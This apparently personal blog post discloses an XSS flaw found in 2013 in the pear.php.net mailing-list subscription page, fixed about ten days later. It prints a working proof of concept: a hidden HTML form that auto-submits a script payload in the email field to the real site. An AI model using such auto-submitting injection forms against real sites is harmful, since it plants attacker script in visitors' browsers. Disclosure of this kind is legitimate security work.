Long time ago (28.06.2013) I found XSS bug in http://pear.php.net/support/lists.php. Email parameter was neither validated nor sanitized which resulted in XSS.
Proof of concept was:
<head>
<script src="http://code.jquery.com/jquery-1.10.1.min.js"></script>
</head>
<body>
<form method="post" action="http://pear.php.net/support/lists.php" id="form" style="display:none">
<input name="maillist[pear-dev]" type="radio" value="normal" checked>
<input type="text" name="email" size="30" value="<script>alert('xss');</script>">
<input type="submit" name="action" value="Subscribe">
</form>
</body>
<script>
$('input[name=action]').click();
</script>
Fixed 08.07.2013.
No comments:
Post a Comment